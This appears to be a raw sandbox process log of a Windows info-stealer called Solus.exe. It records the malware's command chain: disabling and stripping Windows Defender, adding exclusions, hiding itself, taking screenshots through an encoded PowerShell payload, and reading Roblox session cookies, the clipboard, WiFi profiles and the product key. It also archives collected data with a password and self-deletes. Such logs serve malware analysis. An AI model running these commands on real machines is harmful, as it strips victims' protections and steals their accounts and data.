netsh wlan show profile
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\paqb4kqa\paqb4kqa.cmdline"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES13F0.tmp" "c:\Users\Admin\AppData\Local\Temp\paqb4kqa\CSC18BAB8528BBF4A0D9B366462F0596BEF.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37602\rar.exe a -r -hp"bando123" "C:\Users\Admin\AppData\Local\Temp\lEgZH.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI37602\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI37602\rar.exe a -r -hp"bando123" "C:\Users\Admin\AppData\Local\Temp\lEgZH.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Solus.exe""
C:\Windows\system32\PING.EXE
ping localhost -n 3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffb17b9ab58,0x7ffb17b9ab68,0x7ffb17b9ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1748 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2276 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3000 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3032 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3636 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4524 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4668 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4752 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5032 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=1964 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5096 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3040 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3028 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4384 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3108 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4812 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4544 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3336 --field-trial-handle=2020,i,8552851370290337820,17343312444461914471,131072 /prefetch:8
C:\Users\Admin\Downloads\Solus.exe
"C:\Users\Admin\Downloads\Solus.exe"
C:\Users\Admin\Downloads\Solus.exe
"C:\Users\Admin\Downloads\Solus.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Solus.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Solus.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Solus.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\Downloads\Solus.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIA